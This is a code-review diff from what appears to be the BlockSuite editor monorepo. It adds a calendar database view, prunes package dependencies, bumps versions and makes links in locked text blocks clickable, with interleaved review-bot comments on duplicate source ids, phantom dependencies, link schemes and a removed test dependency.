const id = currentViewStorage.getCurrentView(this.model.id);
if (id && dataSource.viewManager.viewGet(id)) {
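Review bot: in the `getAll(CalendarExternalSourceProvider).forEach` block each source is registered under `CalendarExternalSourceProvider(source.id)`, so two providers that report the same `id` overwrite each other and the last one registered wins without any signal. Since these sources come from outside the block, check for an existing registration under that `id` and warn or skip instead of replacing it.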
@@ -293,6 +302,12 @@ export class DatabaseBlockComponent extends CaptionedBlockComponent<DatabaseBloc
widgetPresets.tools.viewOptions,
widgetPresets.tools.tableAddRow,
],
calendar: [
widgetPresets.tools.filter,
widgetPresets.tools.search,
widgetPresets.tools.viewOptions,
widgetPresets.tools.tableAddRow,
],
});
private readonly viewSelection$ = computed(() => {
@@ -427,6 +442,7 @@ export class DatabaseBlockComponent extends CaptionedBlockComponent<DatabaseBloc
headerWidget: this.headerWidget,
onDrag: this.onDrag,
clipboard: this.std.clipboard,
dnd: this.std.dnd,
notification: {
toast: message => {
const notification = this.std.getOptional(NotificationProvider);
@@ -47,7 +47,7 @@ export const databasePropertyConverts = [
propertyModelPresets.multiSelectPropertyModelConfig,
(_property, cells) => {
const options: Record<string, SelectTag> = {};
// eslint-disable-next-line sonarjs/no-identical-functions
// oxlint-disable-next-line sonarjs/no-identical-functions
const getTag = (name: string) => {
if (options[name]) return options[name];
const tag: SelectTag = {
@@ -4,6 +4,7 @@ import { viewConverts, viewPresets } from '@blocksuite/data-view/view-presets';
export const databaseBlockViews: ViewMeta[] = [
viewPresets.tableViewMeta,
viewPresets.kanbanViewMeta,
viewPresets.calendarViewMeta,
];
export const databaseBlockViewMap = Object.fromEntries(
+2 -10
@@ -15,18 +15,10 @@
"@blocksuite/affine-model": "workspace:*",
"@blocksuite/affine-rich-text": "workspace:*",
"@blocksuite/affine-shared": "workspace:*",
"@blocksuite/global": "workspace:*",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/mdast": "^4.0.4",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"zod": "^3.25.76"
"lit": "^3.2.0"
},
"exports": {
".": "./src/index.ts",
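Review bot: the dependency list now ends at `lit`, but nothing in the visible change shows that the sources stopped importing the removed packages (`zod`, `rxjs`, `minimatch` and the others dropped here). In a hoisted workspace a leftover import keeps resolving through another package's install, and this phantom dependency only fails once the package is consumed on its own. Gate this kind of pruning on an undeclared-dependency check in CI so the manifest and the imports cannot diverge.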
@@ -39,5 +31,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -12,7 +12,6 @@
{ "path": "../../model" },
{ "path": "../../rich-text" },
{ "path": "../../shared" },
{ "path": "../../../framework/global" },
{ "path": "../../../framework/std" },
{ "path": "../../../framework/store" }
]
@@ -11,26 +11,17 @@
"license": "MIT",
"dependencies": {
"@blocksuite/affine-block-surface": "workspace:*",
"@blocksuite/affine-components": "workspace:*",
"@blocksuite/affine-ext-loader": "workspace:*",
"@blocksuite/affine-gfx-text": "workspace:*",
"@blocksuite/affine-inline-preset": "workspace:*",
"@blocksuite/affine-model": "workspace:*",
"@blocksuite/affine-rich-text": "workspace:*",
"@blocksuite/affine-shared": "workspace:*",
"@blocksuite/affine-widget-edgeless-toolbar": "workspace:*",
"@blocksuite/global": "workspace:*",
"@blocksuite/icons": "^2.2.17",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"lit": "^3.2.0",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"zod": "^3.25.76"
"lit": "^3.2.0"
},
"exports": {
".": "./src/index.ts",
@@ -43,5 +34,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}
@@ -43,6 +43,11 @@ export class EdgelessTextBlockComponent extends GfxBlockComponent<EdgelessTextBl
font-weight: var(--edgeless-text-font-weight);
text-align: var(--edgeless-text-text-align);
}
.edgeless-text-block-container .locked-content a[href] {
pointer-events: auto;
cursor: pointer;
}
`;
private readonly _resizeObserver = new ResizeObserver(() => {
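Review bot: the `.locked-content a[href]` rule re-enables pointer events for every anchor that has an `href`, whatever its scheme, so a locked block now navigates on click. Confirm that the link renderer restricts `href` to the allowed schemes and applies the same `rel` and `target` handling as in unlocked text, and add a test that a click on such an anchor cannot start editing or dragging the locked block.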
@@ -304,6 +309,7 @@ export class EdgelessTextBlockComponent extends GfxBlockComponent<EdgelessTextBl
style=${styleMap(containerStyle)}
>
<div
class=${!editing && this.model.isLocked() ? 'locked-content' : ''}
style=${styleMap({
pointerEvents: editing ? 'auto' : 'none',
userSelect: editing ? 'auto' : 'none',
@@ -8,14 +8,12 @@
"include": ["./src"],
"references": [
{ "path": "../surface" },
{ "path": "../../components" },
{ "path": "../../ext-loader" },
{ "path": "../../gfx/text" },
{ "path": "../../inlines/preset" },
{ "path": "../../model" },
{ "path": "../../rich-text" },
{ "path": "../../shared" },
{ "path": "../../widgets/edgeless-toolbar" },
{ "path": "../../../framework/global" },
{ "path": "../../../framework/std" },
{ "path": "../../../framework/store" }
@@ -23,20 +23,12 @@
"@blocksuite/icons": "^2.2.17",
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@lit/context": "^1.1.2",
"@preact/signals-core": "^1.8.0",
"@toeverything/theme": "^1.1.23",
"@types/lodash-es": "^4.17.12",
"lit": "^3.2.0",
"lodash-es": "^4.17.23",
"minimatch": "^10.1.1",
"rxjs": "^7.8.2",
"yjs": "^13.6.27",
"zod": "^3.25.76"
},
"devDependencies": {
"vitest": "^3.2.4"
"yjs": "^13.6.27"
},
"exports": {
".": "./src/index.ts",
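Review bot: the `devDependencies` block with `vitest` is removed here while the `files` list of the same manifest still excludes `src/__tests__` and `dist/__tests__`. If tests remain in this package, they now run against whichever `vitest` the workspace root happens to hoist, with no version pinned at package level. Either keep the declaration or confirm the tests were moved or deleted in this change.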
@@ -49,5 +41,5 @@
"!src/__tests__",
"!dist/__tests__"
],
"version": "0.26.1"
"version": "0.26.3"
}

Some files were not shown because too many files have changed in this diff